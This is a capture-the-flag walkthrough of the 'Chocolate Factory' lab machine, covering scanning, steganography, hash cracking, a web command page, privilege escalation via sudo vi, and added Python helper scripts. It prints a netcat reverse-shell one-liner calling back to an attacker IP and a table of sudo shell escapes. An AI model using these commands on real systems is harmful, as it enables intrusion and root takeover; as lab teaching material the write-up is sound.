# Chocolate Factory

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbmyHoOAQREIEg5D7At%2F-MbmyM7st0XqG7UYNTvs%2Fimage.png?alt=media\&token=b75342f5-f943-4344-bd09-543868a23d0b)

## Reconnaissance

Initial nmap scan to find open ports, using **-Pn** ("treat all hosts as alive"), which skips host discovery so the scan still runs if the target drops ping probes.

```
nmap -Pn 10.10.46.164
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbmyHoOAQREIEg5D7At%2F-Mbmz6mmaHoN4L8DfC1P%2Fimage.png?alt=media\&token=a5344c0c-9580-4d10-a543-e4c3f10de9d3)

Detailed nmap scan against the open ports found above.

Command breakdown:

* **-sV**: service version detection
* **-sC**: run the default nmap scripts
* **-p 21,22,80**: scan only ports 21, 22 and 80
* **-oN nmap**: save normal output to a file called `nmap`

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbmzXiRUsfEurSNEq35%2F-Mbn29seXKJgjH7rTtpx%2Fimage.png?alt=media\&token=8f9bb7c9-42de-484c-9ac1-286ac48aabe4)
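The two-stage pattern above (quick scan first, then `-sV -sC` on just the open ports) is worth automating, because hand-copying the port list is where typos creep in. This is an added example, not code from the original write-up; it assumes the first scan was run with `-oG` (grepable output) in addition to the `-oN` used on this page, and the sample output below is constructed to look like that format, not real output from the target.

```python
import re
import shlex

# Constructed sample of nmap "grepable" (-oG) output for the first scan;
# this is not real output from the target in this write-up.
SAMPLE_GREPABLE = """\
# Nmap 7.91 scan initiated as: nmap -Pn -oG quick.gnmap 10.10.46.164
Host: 10.10.46.164 ()\tStatus: Up
Host: 10.10.46.164 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///, 113/filtered/tcp//ident///\tIgnored State: closed (996)
# Nmap done at ... -- 1 IP address (1 host up) scanned in 12.34 seconds
"""

# Only "/open/" entries count; filtered and closed ports are deliberately
# skipped so the second scan is not padded with ports that will not answer.
PORT_RE = re.compile(r"(\d+)/open/(tcp|udp)/")


def open_ports(grepable: str, proto: str = "tcp") -> list[int]:
    """Return the sorted, de-duplicated open ports of one protocol from -oG text."""
    ports = set()
    for line in grepable.splitlines():
        if "Ports:" not in line:
            continue
        for port, p in PORT_RE.findall(line):
            if p == proto:
                ports.add(int(port))
    return sorted(ports)


def detailed_scan_cmd(target: str, ports: list[int], outfile: str = "nmap") -> list[str]:
    """Build the argv for the second-stage scan: -sV -sC on the open ports only."""
    if not ports:
        raise ValueError("no open ports found; nothing to scan in detail")
    port_list = ",".join(str(p) for p in ports)
    return ["nmap", "-Pn", "-sV", "-sC", "-p", port_list, "-oN", outfile, target]


if __name__ == "__main__":
    found = open_ports(SAMPLE_GREPABLE)
    print("open tcp ports:", found)
    print(shlex.join(detailed_scan_cmd("10.10.46.164", found)))
```

Feed it the real `.gnmap` file (`open_ports(open("quick.gnmap").read())`) and the printed command is the one run on this page, with port 113 correctly left out because it was filtered rather than open.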

## Enumeration

### Port 21: FTP

Anonymous login is allowed, so let's check it out.

```
ftp 10.10.46.164
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2Am6QU066nGLxAqU%2F-Mbn2RARxmR-bVQSwT5W%2Fimage.png?alt=media\&token=e0e8083f-981f-4fca-8086-cef1ad37d068)

Let's list the files.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2Am6QU066nGLxAqU%2F-Mbn2Yr6TdMOmctEEc5T%2Fimage.png?alt=media\&token=b3504b4b-ad00-4f1b-92e6-7d0d1d2501c0)

There is a single file and it is an image, so let's transfer it to our machine.

```
get gum_room.jpg
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2Am6QU066nGLxAqU%2F-Mbn2iG89tIjPlMZvTf7%2Fimage.png?alt=media\&token=47403b51-f89a-4432-af92-34129af23d10)

Let's look at the image.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnD5LfdmufEYF1sW1T%2Fimage.png?alt=media\&token=5b0e3e62-19fd-461e-b91a-00c3173d4a30)

Let's check whether anything is hidden inside the file with `steghide`.

```
steghide info gum_room.jpg
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn3yjVlI_FY_JzB_Mg%2Fimage.png?alt=media\&token=e781bdee-85e5-4b8d-815e-6386296b65bd)

Pressing Enter for an empty passphrase worked. One embedded file, `b64.txt`, is reported, so let's extract it.

```
steghide --extract -sf gum_room.jpg
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn4Ajq3xqe0eGwOwoL%2Fimage.png?alt=media\&token=6db528e9-d450-4a3e-bb1a-138ba8869dfc)

Let's read the file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn4FmjP1g9Hma7uadS%2Fimage.png?alt=media\&token=df9cf4f3-b085-47fe-ae4f-c71e5efeb4a1)

The content is base64-encoded, so let's decode it. This is the decoded output.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn4gwru3tMNrSSlAqo%2Fimage.png?alt=media\&token=2cfae13f-8fd1-4954-8d38-d5fa1a71b6a7)

We have the password hash for the user `charlie`. Let's use hashcat to crack it and recover Charlie's password.

Copy the hash into a file called `hash.txt`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mbn2o5V3CdZyI6aNBBY%2F-Mbn5H9SYnLwY8e7-MvS%2Fimage.png?alt=media\&token=1e3a25b9-122c-4cd9-98db-c02d1773f5d1)

Now let's crack it with `hashcat`. Mode 1800 is sha512crypt (the `$6$...` format the hash uses), `-a 0` is a straight wordlist attack, and rockyou is the wordlist.

```bash
hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnB4NVZPRriY9jk8Qs%2Fimage.png?alt=media\&token=9f954e09-5c2f-408d-9ef6-f11b92624e80)

We found the password `cn7824`; let's try to log in through SSH.

```bash
ssh charlie@10.10.46.164
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnBO4rpdqP-QozvMgx%2Fimage.png?alt=media\&token=4af51fd4-3131-4973-8e60-59d07bb50847)

This is not the password for SSH, so let's go and explore port 80.
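The steps above (decode the base64 text, pull the hash out of it, pick the right hashcat mode) are a routine you end up repeating on most boxes, and picking the wrong `-m` is the usual reason hashcat reports "no hashes loaded". The following is an added example, not code from the original write-up. The base64 blob is constructed here (a shadow-style `user:hash` line with a made-up salt and digest, not the room's real hash), and the mode table only lists crypt(3) formats whose hashcat modes I am sure of.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed stand-in for the extracted b64.txt: a shadow-style "user:hash"
# line, base64-encoded. The salt and digest are made up, not the room's hash.
SAMPLE_B64 = base64.b64encode(
    b"charlie:$6$constructedsalt$" + b"x" * 86 + b"\n"
).decode()

# crypt(3) identifier -> hashcat -m mode (assumed subset, all verified).
CRYPT_MODES = {
    "1": 500,    # md5crypt
    "5": 7400,   # sha256crypt
    "6": 1800,   # sha512crypt, the mode used on this page
    "2a": 3200,  # bcrypt variants
    "2b": 3200,
    "2y": 3200,
}
CRYPT_RE = re.compile(r"^\$(?P<id>[0-9a-z]+)\$(?P<rest>.+)$")


def decode_hash_line(b64_text: str) -> tuple:
    """Decode the base64 text and split an optional 'user:' prefix off the hash.

    Returns (user_or_None, hash). Raises ValueError on bad base64 or if the
    decoded text does not look like a crypt(3) hash.
    """
    compact = "".join(b64_text.split())  # tolerate wrapped/ragged base64
    try:
        raw = base64.b64decode(compact, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not base64-encoded text: {exc}") from exc
    line = raw.strip().splitlines()[0] if raw.strip() else ""
    user, sep, h = line.partition(":")
    if not sep:  # bare hash with no user field
        user, h = None, line
    if not CRYPT_RE.match(h):
        raise ValueError(f"does not look like a crypt(3) hash: {h!r}")
    return user, h


def hashcat_mode(h: str) -> int:
    """Map a crypt(3) hash to the hashcat mode that cracks it."""
    m = CRYPT_RE.match(h)
    if not m or m.group("id") not in CRYPT_MODES:
        raise ValueError(f"unsupported hash format: {h[:4]!r}")
    return CRYPT_MODES[m.group("id")]


def hashcat_cmd(h: str, hashfile: str = "hash.txt",
                wordlist: str = "/usr/share/wordlists/rockyou.txt") -> list:
    """argv for the straight wordlist attack shown on this page, mode chosen from the hash."""
    return ["hashcat", "-a", "0", "-m", str(hashcat_mode(h)), hashfile, wordlist]


if __name__ == "__main__":
    user, h = decode_hash_line(SAMPLE_B64)
    print(f"user={user} mode={hashcat_mode(h)}")
    print(" ".join(hashcat_cmd(h)))
```

Write only the hash (not the `user:` prefix) into `hash.txt`, since hashcat in this mode expects the bare `$6$...` string per line; `hashcat --show -m 1800 hash.txt` then prints the cracked pair after the run.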

### Port 80: HTTP

Let's visit the website.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnAxmFR5YyXQnD6tKP%2Fimage.png?alt=media\&token=ab09aa6b-3bfb-4868-b2c2-02e099287ea1)

It's a login page. Remember the credentials we just recovered; let's use them to log in.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnB_nFPdy6hcPexDkR%2Fimage.png?alt=media\&token=e36fdd20-a666-4cad-9d2d-30ff313a5279)

We are logged in, and the page lets us run commands. Ordinary commands work, so let's use it to get a reverse shell. First start a netcat listener on our machine:

```bash
nc -lvnp 1234
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnBothtnUWGk1N65vD%2Fimage.png?alt=media\&token=9fc47540-0b4a-4e11-bdbb-5744c76e90f5)

Let's take a reverse shell one-liner from [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). Replace `10.13.8.64` with your own VPN address and `1234` with the port the listener is on.

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f
```

Execute this command through the web page and we get a reverse shell on the machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnCGSAFB4powThNzIh%2Fimage.png?alt=media\&token=2afa72ce-2d10-4a9c-9a0b-7a7fe590370b)

Let's stabilize this shell with these commands (use `python3` if plain `python` is not present on the target):

```bash
python -c 'import pty; pty.spawn("/bin/bash")'   # upgrade the raw shell to a pty
# press Ctrl+Z to background the shell on your machine
stty raw -echo; fg                                # pass keystrokes (tab, Ctrl+C) through to the remote shell
reset                                             # redraw the terminal; answer "xterm" if asked for a type
# press Ctrl+C once if the prompt does not come back
export TERM=xterm-color                           # so clear, vi and friends know the terminal
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnCYogC1qT4gqIXlFZ%2Fimage.png?alt=media\&token=d5a5efce-3d39-4e62-91f6-759305e2a519)

Let's list the files in the current directory.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnCjvr0EhmIZinvUhF%2Fimage.png?alt=media\&token=a46f765a-1c92-4e49-b540-30d00178e164)

We have a `validate.php` file; let's read it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnDEpDpsdlehKat3H7%2Fimage.png?alt=media\&token=e55d287c-6dba-44da-9665-7f4c90200c3e)

It contains the credentials we just used to log in to the web page. Trying to run the `key_rev_key` binary fails with permission denied.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnDnUCRTzLTlxjl2sI%2Fimage.png?alt=media\&token=744f3274-beb5-48e7-b9c3-51d2a6255a4e)

So let's use `strings`, which prints the runs of printable characters inside a file, and it reveals important information without executing the binary.

```bash
strings key_rev_key
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnE5LE7e3L5Nou5kB5%2Fimage.png?alt=media\&token=34e1408b-1515-4364-8063-791c7ea9c718)
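Why does `strings` find the key at all? It scans the bytes of the file, not the program's logic, so anything stored as a plain ASCII literal shows up whether or not you can execute the binary. The following is an added example (not code from the original write-up) that implements the same scan the way `strings` does it: runs of at least four printable bytes are kept, shorter runs are dropped. The "binary" is a constructed byte string with a made-up prompt and key; it is not the real `key_rev_key` or its key.

```python
import re
import string

# Printable set used by this scanner (ASCII letters, digits, punctuation,
# space and tab). A simplification of what strings(1) accepts by default.
PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " \t")

# Constructed stand-in for a small ELF: header bytes and junk around two
# embedded ASCII literals. Not the real key_rev_key, not the real key.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(0, 32)) + b"ab\x00"  # "ELF" and "ab" are too short
    + b"Enter your key: \x00" + b"\x90" * 8
    + b"example_key_value\x00" + bytes(range(200, 256)) + b"done\n"
)


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Return every run of >= min_len printable bytes, in file order, like strings(1).

    A run ends at the first byte outside PRINTABLE (NUL, control bytes,
    anything >= 0x80), and runs shorter than min_len are discarded, which is
    why the 3-byte "ELF" magic does not appear in real strings output either.
    """
    found, run = [], bytearray()
    for b in data:
        if chr(b) in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:  # run that reaches end of file
        found.append(run.decode("ascii"))
    return found


def find_key_candidates(strs: list, pattern: str = r"key") -> list:
    """Grep the extracted strings for a hint such as 'key'; the literal next to a
    prompt is usually the value the program compares against."""
    return [s for s in strs if re.search(pattern, s, re.IGNORECASE)]


if __name__ == "__main__":
    extracted = printable_strings(SAMPLE_BINARY)
    for s in extracted:
        print(repr(s))
    print("candidates:", find_key_candidates(extracted))
```

On a real ELF the output also contains section names, library symbol names and compiler tags, so in practice you grep it (`strings key_rev_key | grep -i key`) or use `strings -n 8` to raise the minimum length and cut the noise. A binary that builds the key at runtime (XOR, per-character arithmetic) would not give it up this way; that is the point where `ltrace`, `gdb` or a disassembler takes over.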

We have a key. With this information we can answer two questions in the room.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnECknfX18oWjAr83F%2Fimage.png?alt=media\&token=980523eb-498f-4368-b04e-3b832a9f2939)

While enumerating, we find that we can change directory into Charlie's home, and listing it shows `user.txt` and some other files.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnATxnPisXeoapi3IP%2F-MbnF7jg1dAW71ENHOsY%2Fimage.png?alt=media\&token=8ac96788-0cbd-47d1-ac2d-87d97a5818e8)

Let's read the `teleport` file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnFLsO9WHlxLtQdckd%2Fimage.png?alt=media\&token=d1608d57-e6ae-4fb2-b7ea-1271a2e61a07)

It's an RSA private key, which we can use to log in as `charlie` through SSH. First copy the contents of the file into a file on your machine called `id_rsa`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnFiJ-5qzIPUaPrNJX%2Fimage.png?alt=media\&token=b43949b4-5322-4e46-9d82-2a351ebadfc2)

Now restrict the file's permissions; SSH refuses to use a private key that is readable by other users:

```bash
chmod 600 id_rsa
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnFueZniGk5NXgCNIA%2Fimage.png?alt=media\&token=a2f4bd43-c94a-4eee-aba7-815614baed54)

Now let's log in.

```bash
ssh -i id_rsa charlie@10.10.46.164
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnG5eZY1JvsD7r-IB7%2Fimage.png?alt=media\&token=c1eee460-24c2-424e-babb-ef49b05c5dce)

We are logged in.

## Privilege Escalation

Let's run `sudo -l` to see what we can run as root.

```bash
sudo -l
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnGWduFlBgURDowrka%2Fimage.png?alt=media\&token=66c3db24-b64d-458a-ad53-10284dae3bde)

We can run `/usr/bin/vi` as root, so let's check [GTFOBins](https://gtfobins.github.io/gtfobins/vi/#sudo) for the command to escalate our privileges.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnGjVioryi2EkVXJ7U%2Fimage.png?alt=media\&token=5e652a95-f12c-4572-868e-977546f4a9c1)

Let's run this command. `-c` executes an ex command when vi starts, and `:!/bin/sh` spawns a shell; because vi itself is running as root under sudo, so is the shell.

```bash
sudo vi -c ':!/bin/sh' /dev/null
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnGrlL0R8QJZqt9LZa%2Fimage.png?alt=media\&token=0de644a9-75bb-4d05-ae9f-d1cbbb4e6643)
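The `sudo -l` check and the GTFOBins lookup above are the two halves of one routine: read the rules, then ask whether any allowed binary can spawn a shell. The following is an added example, not code from the original write-up. It parses `sudo -l` output, flags rules whose binary has a documented shell escape, and prints the escape. The sample output is constructed to match the shape shown on this page (hostname, Defaults line and the second rule are made up), and the escape table is a small assumed subset of GTFOBins.

```python
import re

# Constructed sample of `sudo -l` output; hostname and rules are made up and
# only mimic the format shown in the write-up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : ALL) /usr/bin/vi
    (root) NOPASSWD: /usr/bin/systemctl status apache2
"""

# One rule line: "(runas) [TAG: ...] command args".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# Binaries whose sudo rule yields a root shell, with the GTFOBins escape as the
# user would type it. Assumed subset; extend from https://gtfobins.github.io/.
SHELL_ESCAPES = {
    "vi":   "sudo vi -c ':!/bin/sh' /dev/null",
    "vim":  "sudo vim -c ':!/bin/sh' /dev/null",
    "less": "sudo less /etc/profile   (then type !/bin/sh)",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "awk":  "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
}


def parse_sudo_l(text: str) -> list:
    """Return the rules section of `sudo -l` as dicts: runas, nopasswd, command.

    Lines before the "User ... may run the following commands" header are the
    Defaults section and are ignored, so a "(ALL : ALL)" in a Defaults entry
    is never mistaken for a rule.
    """
    rules, in_rules = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "command": m.group("cmd"),
        })
    return rules


def shell_escape_findings(rules: list) -> list:
    """(command, escape) for every rule whose binary has a known shell escape."""
    findings = []
    for r in rules:
        binary = r["command"].split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append((r["command"], SHELL_ESCAPES[binary]))
    return findings


if __name__ == "__main__":
    parsed = parse_sudo_l(SAMPLE_SUDO_L)
    for rule in parsed:
        print(rule)
    for cmd, escape in shell_escape_findings(parsed):
        print(f"[!] {cmd} -> {escape}")
```

The defensive reading of the same output: a rule granting a full-featured editor as root is a root grant, however it is phrased. If the intent is "let charlie edit a file as root", `sudoedit` (which runs the editor as the calling user on a temporary copy) is the least-privilege alternative; if the intent is a single command, pin the arguments in the rule as the second sample line does.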

We are now root. Changing into `/root` to find the flag, we see that it is not in a plain file: a Python script has to be run to produce it. Running it asks for a key, the one we recovered from `key_rev_key` during enumeration. Type it in and you get the root flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbnFAVVRN6WGFYs569O%2F-MbnHh0aYXsq8jk0tMji%2Fimage.png?alt=media\&token=7dc817a5-b44a-435c-a216-328c8f3cfa25)
